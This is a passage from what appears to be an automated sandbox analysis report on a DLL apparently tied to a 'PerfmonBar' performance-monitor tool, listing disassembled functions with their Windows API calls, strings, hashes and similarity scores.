InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6EA10D5E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6EA10D72

Strings

Performance Monitor - (Reload Configuration), xrefs: 6EA10D4C
Performance Monitor - (Edit Configuration), xrefs: 6EA10D60

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 48d954b4bb90e59484008396503a7fdfbae343d5d4bac243237456b845e63e46
Instruction ID: 3fd092156d50764e001fb1294e03d4cfa0311f8cfec5f9fd754cbdf95550757c
Opcode Fuzzy Hash: 48d954b4bb90e59484008396503a7fdfbae343d5d4bac243237456b845e63e46
Instruction Fuzzy Hash: 12F05E3324421DBBEB11DEC59C81FBB7B6CEB49710F148416FB14AA181C371A9269BB8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA25019, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EA24FCB,?,?,6EA24F93,?,00000000,?), ref: 6EA2502E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EA25041
FreeLibrary.KERNEL32(00000000,?,?,6EA24FCB,?,?,6EA24F93,?,00000000,?), ref: 6EA25064

Strings

mscoree.dll, xrefs: 6EA25027
CorExitProcess, xrefs: 6EA25039

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 29891d75e3c356b98cccbc5611185e5c5e4248ede032101dd84d46cc3118d040
Instruction ID: 5997a3b0dc86cd62d2cf280c855f63a41c166ddecfef124b485d21567bf3ec16
Opcode Fuzzy Hash: 29891d75e3c356b98cccbc5611185e5c5e4248ede032101dd84d46cc3118d040
Instruction Fuzzy Hash: ABF05831900628FFDF219B91CD09B9E7B7AFF01352F194160B905FA260CB368E81DAD6

Uniqueness

Uniqueness Score: -1.00%

Function 6EA36EEE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6EA26918,00000000,?,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001), ref: 6EA36F05
GetLastError.KERNEL32(?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000,00000001,?,6EA2EDAE,6EA2685B), ref: 6EA36F11

Part of subcall function 6EA36ED7: CloseHandle.KERNEL32(FFFFFFFE,6EA36F21,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000,00000001), ref: 6EA36EE7

___initconout.LIBCMT ref: 6EA36F21

Part of subcall function 6EA36E99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EA36EC8,6EA3630A,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000), ref: 6EA36EAC

WriteConsoleW.KERNEL32(?,?,6EA26918,00000000,?,6EA3631D,?,00000001,?,00000001,?,6EA2E85A,00000000,00000000,00000001,00000000), ref: 6EA36F36

Strings

@Mt, xrefs: 6EA36F11

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID: @Mt
API String ID: 2744216297-1491384996
Opcode ID: 60c2d09bcc317e2a8fa6e7255305bdb638b62c52949b559274c5414bd56abbce
Instruction ID: 6955ba3b2289282d38eb5c50636a8e3ecb465f9717931a921e21898864a75bfe
Opcode Fuzzy Hash: 60c2d09bcc317e2a8fa6e7255305bdb638b62c52949b559274c5414bd56abbce
Instruction Fuzzy Hash: 5DF01C36020635BBCF225FD1CC0898A3F66EF4A3A4B248415FA0CE9220C73288A5DBD4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05CE0, Relevance: 7.7, APIs: 5, Instructions: 160threadclipboardCOMMON

Download Yara Rule

APIs

GetThreadErrorMode.KERNEL32(74E04D10,0000001D,00000000,0000001D,?,6EA05C67,74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05D00
GetClipboardSequenceNumber.USER32(?,6EA05C67,74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05D0F

Part of subcall function 6EA05AB0: GetClipboardSequenceNumber.USER32(74E04D10,00000033,?,00000000,00000000,0000005F,00000000,00000002,74E00DE0), ref: 6EA05AC1

Part of subcall function 6EA05AB0: GetActiveWindow.USER32 ref: 6EA05BE7
Part of subcall function 6EA05AB0: GetTickCount.KERNEL32 ref: 6EA05C20
Part of subcall function 6EA05AB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05CAA

GetActiveWindow.USER32 ref: 6EA05E35
GetTickCount.KERNEL32 ref: 6EA05E66
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6EA05EF3

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveClipboardCountNumberSequenceTickUnothrow_t@std@@@Window__ehfuncinfo$??2@$ErrorModeThread
String ID:
API String ID: 1223628243-0
Opcode ID: 5c1a38455cbabf31bdcb809836ed0265641693fff175d016d99dfb82c6f09cbd
Instruction ID: ba81650c55bafc90a082eba6400064702a60048d2ceb47048ce3b25d60a70b5c
Opcode Fuzzy Hash: 5c1a38455cbabf31bdcb809836ed0265641693fff175d016d99dfb82c6f09cbd
Instruction Fuzzy Hash: E6517F31D347144BD72393B2E14515EA29A5F9B28CF28CF23F401FB161FF2558D24945

Uniqueness

Uniqueness Score: -1.00%

Function 6EA121E0, Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA121EC
GetCurrentThreadId.KERNEL32 ref: 6EA121FC
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12219
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA1223D
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6EA12289

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$CurrentEnterLongThreadWindow
String ID:
API String ID: 4199534935-0
Opcode ID: cbf5a9764ae12ccaafbaedde0b7b104975e5106bfe167e11037dc2f925814208
Instruction ID: 9d4f4a0333d5cd647f8fc510e939a5b300ba769deb29e85cf51fc261ba2a2369
Opcode Fuzzy Hash: cbf5a9764ae12ccaafbaedde0b7b104975e5106bfe167e11037dc2f925814208
Instruction Fuzzy Hash: 3621A4726086219B9B209FE5EC0898B7BAAFF87360305C529F849DB600DB30D891D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA15A5C, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA15A6D

Part of subcall function 6EA02040: std::_Lockit::_Lockit.LIBCPMT ref: 6EA0205D
Part of subcall function 6EA02040: std::_Lockit::~_Lockit.LIBCPMT ref: 6EA02079

codecvt.LIBCPMT ref: 6EA15AA7
std::_Facet_Register.LIBCPMT ref: 6EA15ABE
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA15ADE
Concurrency::cancel_current_task.LIBCPMT ref: 6EA15AEB

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 3595785899-0
Opcode ID: dc6934984b1f0f32540637ff9f968cebfb66d53879743351fa8f5897dade9a3e
Instruction ID: e1e9a0da41b43dd88b8d3b7f91c037640c2e420b896381877b67c95343588142
Opcode Fuzzy Hash: dc6934984b1f0f32540637ff9f968cebfb66d53879743351fa8f5897dade9a3e
Instruction Fuzzy Hash: BC01D671908619CBCB01EBE4C9546FEB7BAAF84718F244809D811AB2C0CF349E81CF98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA337CE, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA337E6

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA337F8
_free.LIBCMT ref: 6EA3380A
_free.LIBCMT ref: 6EA3381C
_free.LIBCMT ref: 6EA3382E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ada32af28a7c4ff63561b6bd38dfe35b1629af14999c3ee6fcd8a49ad1295331
Instruction ID: 2345dc9490290a3069a5a77ae4934edf01b03d7073a450b9994c710e689059e3
Opcode Fuzzy Hash: ada32af28a7c4ff63561b6bd38dfe35b1629af14999c3ee6fcd8a49ad1295331
Instruction Fuzzy Hash: A4F04471504A159B8A55DAD8D589C4A73EDFE807143698C25F07CEB940C725FCC486A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1ED27, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 498COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6EA1F036

Strings

A, xrefs: 6EA1EDDD
:, xrefs: 6EA1EDCE
Z, xrefs: 6EA1EDE4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$A$Z
API String ID: 1302938615-166580712
Opcode ID: 9e41f81d9d391f8188fe1a3aef49e763cfda8d2cdbc5ab3d0ee754379a95d00f
Instruction ID: d2cc13cd65178c95da6c28c321adb39354c1b9013ed83b0029f4c4f91f13ca34
Opcode Fuzzy Hash: 9e41f81d9d391f8188fe1a3aef49e763cfda8d2cdbc5ab3d0ee754379a95d00f
Instruction Fuzzy Hash: E2F1E87C51C1869AFB10CFEAD8946D8B3F2AF40714BF8852AD9247B685D7308FC98719

Uniqueness

Uniqueness Score: -1.00%

Function 6EA019B0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA01BEF
Concurrency::cancel_current_task.LIBCPMT ref: 6EA01C61
___std_exception_destroy.LIBVCRUNTIME ref: 6EA01C90

Strings

K;(Io, xrefs: 6EA019D8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_task___std_exception_copy___std_exception_destroy
String ID: K;(Io
API String ID: 2156820804-79920696
Opcode ID: 4f0da110f295102248c537eb61ce0f81f4cfcbd05674effd243b94e858edcd65
Instruction ID: ca5d433a4f6a37025e6a2f070f11fbd60fcba11ad4d8a77e775aca301051ba09
Opcode Fuzzy Hash: 4f0da110f295102248c537eb61ce0f81f4cfcbd05674effd243b94e858edcd65
Instruction Fuzzy Hash: 2EA18F71D04218DFDB14CFE8D980BEDBBB5FF59308F148629E815A7281E734A984CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0BD70, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6EA0BEED
std::_Xinvalid_argument.LIBCPMT ref: 6EA0BFAC

Strings

unordered_map/set too long, xrefs: 6EA0BFA7
K;(Io, xrefs: 6EA0BD87

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument__floor_pentium4std::_
String ID: K;(Io$unordered_map/set too long
API String ID: 3194428529-2602676690
Opcode ID: 47f9dc5f2c77ca99f289799e4050fef0da74e0253a9e469288a590ceb3583a74
Instruction ID: 5cf169291fc6c5f1ff1dcd49357481f267cb4e8f87543fe0241687f0386b803d
Opcode Fuzzy Hash: 47f9dc5f2c77ca99f289799e4050fef0da74e0253a9e469288a590ceb3583a74
Instruction Fuzzy Hash: B071BD71A00709CFCB11CFA9D590A9AFBF4FF49318F24866AE445AB340E731A981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA139A0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6EA13AE2
std::_Xinvalid_argument.LIBCPMT ref: 6EA13BAB

Strings

unordered_map/set too long, xrefs: 6EA13BA6
K;(Io, xrefs: 6EA139B7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument__floor_pentium4std::_
String ID: K;(Io$unordered_map/set too long
API String ID: 3194428529-2602676690
Opcode ID: 68d62c92a37706b0f766a429384686c17adbd587eb2ff31593c1f7a9f40b5126
Instruction ID: de7f2818e4d84a011e2106bedf9ec822e9fbe18ed7741a8b154de6b02a1750ef
Opcode Fuzzy Hash: 68d62c92a37706b0f766a429384686c17adbd587eb2ff31593c1f7a9f40b5126
Instruction Fuzzy Hash: EF61D070A0860ADFCB04CFA9C444AAEFBB5FF49314F24866AD445BB340E731E885CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2ECF0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 178fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA2E483: GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EA2E4CB

WriteFile.KERNEL32(?,00000000,6EA26918,?,00000000,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918,?), ref: 6EA2EE41
GetLastError.KERNEL32 ref: 6EA2EE4B
__dosmaperr.LIBCMT ref: 6EA2EE90

Strings

@Mt, xrefs: 6EA2EE4B

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: @Mt
API String ID: 251514795-1491384996
Opcode ID: c0ba0938fd968babe6b072576e4682cb13d6c6902b65025ce0ab2657e79fae2d
Instruction ID: 2a3b622ead2906f75340bba7e9fb8296d1a98e7b7ef792e5044711bcfc70de65
Opcode Fuzzy Hash: c0ba0938fd968babe6b072576e4682cb13d6c6902b65025ce0ab2657e79fae2d
Instruction Fuzzy Hash: CA51A17190021AAFDB129BF4C980BEEBBB9EF06318F0C9865E410BB150D7319DC1C769

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0FBD0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 6EA0FD0D
SysStringLen.OLEAUT32(00000000), ref: 6EA0FD19
SysFreeString.OLEAUT32(00000000), ref: 6EA0FD40

Strings

K;(Io, xrefs: 6EA0FBE4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free
String ID: K;(Io
API String ID: 1391021980-79920696
Opcode ID: 17dea4094ec2e152fd90261ce31c3300e1cff73f59326589cfd314dbe8bbf147
Instruction ID: fcbaaea523913fc9d10e60f4fb4b97d0420df7f41394a673ba883f421c6a0f07
Opcode Fuzzy Hash: 17dea4094ec2e152fd90261ce31c3300e1cff73f59326589cfd314dbe8bbf147
Instruction Fuzzy Hash: 67515A75A00616DFDB44DFA8C844AAEBBF5FF49314F20852EE815FB350E734A9418B68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2EAD4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 105fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,6EA2EE15,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000), ref: 6EA2EBBD
GetLastError.KERNEL32(6EA2EE15,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918,?), ref: 6EA2EBED

Strings

@Mt, xrefs: 6EA2EBED
K;(Io, xrefs: 6EA2EAE3

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt$K;(Io
API String ID: 442123175-206996876
Opcode ID: af0ca7089a84f643f0ef12e8e996313be0283dc428e4387430fd763ee1ca77d2
Instruction ID: d0ed5b9a9ce2d81361eb271475aa9444f08b2d70746abaf17b4af4b46bbcb1f2
Opcode Fuzzy Hash: af0ca7089a84f643f0ef12e8e996313be0283dc428e4387430fd763ee1ca77d2
Instruction Fuzzy Hash: 69317571A00219AFEB15CF69CC81AE973B5EB45300F1880BAE50AE7290D771EDC5CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2DD67, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6EA2DDDA
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 6EA2DE37
__freea.LIBCMT ref: 6EA2DE40

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

Strings

K;(Io, xrefs: 6EA2DD6F

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapStringType__alloca_probe_16__freea
String ID: K;(Io
API String ID: 2035984020-79920696
Opcode ID: 95466a3627b619eb26548733dff1090389b0924bff24ad7cddb3f2a32b122a1c
Instruction ID: fbb4b525dc60f63525db88ed5ae206ebea640f0d68dada209b6474e3c5233058
Opcode Fuzzy Hash: 95466a3627b619eb26548733dff1090389b0924bff24ad7cddb3f2a32b122a1c
Instruction Fuzzy Hash: A631AE7190021AAFDB118FA5CC40EEF7BA9EF94714F194628E814BB251D7318D91CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0AF10, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

K;(Io, xrefs: 6EA0AD1B, 6EA0AF38, 6EA0B4F1
\PerfmonBar\config.xml, xrefs: 6EA0ADB9

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: K;(Io$\PerfmonBar\config.xml
API String ID: 0-3598269376
Opcode ID: 41270ab128269798f1f166527c02124ab816e59e31ddf82660710ef642ba5fe1
Instruction ID: 9355a1c46bcdb6e8f88a79ad9d934a4bc9a90d60c56e4803596b0a7dc43cc22d
Opcode Fuzzy Hash: 41270ab128269798f1f166527c02124ab816e59e31ddf82660710ef642ba5fe1
Instruction Fuzzy Hash: 833178B1E006589FDB10CFA8C944B9EBBF8FB08714F144269E815AB380DB35A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E9E9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000001,00000000,?,6EA2EE05,6EA2685B,00000001,00000000,6EA26918,?,?), ref: 6EA2EA93
GetLastError.KERNEL32(?,6EA2EE05,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918), ref: 6EA2EAB9

Strings

@Mt, xrefs: 6EA2EAB9
K;(Io, xrefs: 6EA2E9F8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt$K;(Io
API String ID: 442123175-206996876
Opcode ID: 67fd45070652bb9886e40456b35272663ef43e6890fd99395c5eb9a8ff75e136
Instruction ID: d5fea100fd71d808350441e34f560b260c576ad2eb4ec703dc59b187034fb601
Opcode Fuzzy Hash: 67fd45070652bb9886e40456b35272663ef43e6890fd99395c5eb9a8ff75e136
Instruction Fuzzy Hash: E7318131A002199FDF25CF69CC809DAB3B5FF49315B1885B9E909EB250D7309DC5CA95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E90C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000001,00000000,?,6EA2EE25,6EA2685B,00000001,00000000,6EA26918,?,?), ref: 6EA2E9A8
GetLastError.KERNEL32(?,6EA2EE25,6EA2685B,00000001,00000000,6EA26918,?,?,?,6EA2685B,?,00000000,00000000,6EA4A338,0000002C,6EA26918), ref: 6EA2E9CE

Strings

@Mt, xrefs: 6EA2E9CE
K;(Io, xrefs: 6EA2E91B

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: @Mt$K;(Io
API String ID: 442123175-206996876
Opcode ID: e79971fa1344e0059ac51be424b8975a77ffb86675f6f832f7aa10e8fcceff84
Instruction ID: f361839c8d1584b7c5a35fe295076219e31eb167bef4350bb5c080fd4a320d63
Opcode Fuzzy Hash: e79971fa1344e0059ac51be424b8975a77ffb86675f6f832f7aa10e8fcceff84
Instruction Fuzzy Hash: 6021A731A002199FDF16CF6ACC809D9B7B9EB49301F1481BAE949E7211D630DDC6CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01EB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA01EDB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6EA01F2A

Part of subcall function 6EA15592: _Yarn.LIBCPMT ref: 6EA155B1
Part of subcall function 6EA15592: _Yarn.LIBCPMT ref: 6EA155D5

Strings

bad locale name, xrefs: 6EA01F46
K;(Io, xrefs: 6EA01EC3

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: K;(Io$bad locale name
API String ID: 1908188788-3163992761
